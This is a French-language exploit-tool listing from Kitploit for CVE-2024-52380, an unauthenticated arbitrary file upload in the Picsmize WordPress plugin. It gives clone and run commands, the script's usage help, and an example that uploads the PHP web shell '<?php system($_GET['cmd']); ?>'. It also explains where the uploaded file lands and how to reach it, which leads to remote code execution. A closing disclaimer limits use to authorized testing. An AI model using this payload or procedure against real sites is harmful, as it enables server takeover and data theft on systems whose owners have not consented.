Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-52380-Exploit — Le plugin Picsmize pour WordPress est vulnérable aux téléchargements arbitraires de fichiers. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-52380-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

Le plugin Picsmize pour WordPress est vulnérable aux téléchargements arbitraires de fichiers.

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-52380-Exploit

Le plugin Picsmize pour WordPress est vulnérable aux téléchargements de fichiers arbitraires.

Description

Ce script exploite une vulnérabilité (CVE-2024-52380) dans le plugin Picsmize pour WordPress, permettant à des attaquants non authentifiés d'effectuer des téléchargements de fichiers arbitraires. Cette vulnérabilité existe dans toutes les versions de Picsmize jusqu'à la version 1.0.0 incluse. L'exploitation de cette vulnérabilité peut entraîner une exécution de code à distance sur le serveur cible.

🌟 Fonctionnalités

  • Vérification de la version du plugin : Vérifie automatiquement si le site WordPress cible utilise une version vulnérable du plugin Picsmize.
  • Exploitation du téléchargement de fichier : Télécharge des charges utiles PHP arbitraires sur le serveur cible si le site est vulnérable.
  • Interface en ligne de commande : CLI facile à utiliser pour spécifier les URL cibles et les charges utiles.

📖 Détails de la vulnérabilité

  • Nom du plugin : Picsmize
  • Versions affectées : Toutes les versions ≤ 1.0.0
  • Type de vulnérabilité : Téléchargement de fichier arbitraire sans authentification
  • Identifiant CVE : CVE-2024-52380

🚀 Instructions d'utilisation

Prérequis

  • Python 3.7 ou supérieur
  • Bibliothèque requests (pip install requests)

Exécution du script

  1. Clonez le dépôt :
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    

Utilisation -help

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

Exemple

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

Arguments de la ligne de commande

Le script fournit deux arguments en ligne de commande pour faciliter l'utilisation :

  1. -u / --url (obligatoire) :

    • Objectif : Spécifie l'URL de base du site WordPress cible.
    • Exemple :
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content (facultatif) :

    • Objectif : Définit le contenu de la charge utile PHP à télécharger.
    • Valeur par défaut :
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • Exemple :
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 Chemin de téléchargement du fichier

Explication :

  • /wordpress : Répertoire racine du site WordPress.
  • wp-content/uploads : Répertoire par défaut pour les téléchargements de médias dans WordPress.
  • 2025/01 : La structure de répertoires correspond à l'année (2025) et au mois (janvier) en fonction de la configuration de la date du serveur.

Comment accéder au fichier téléchargé :

  1. Après un téléchargement réussi, accédez au fichier en utilisant l'URL complète. Exemple :

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ Avertissement

Ce script est destiné à des fins éducatives et uniquement à des tests de sécurité autorisés. L'utilisation non autorisée de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.

Télécharger l’outil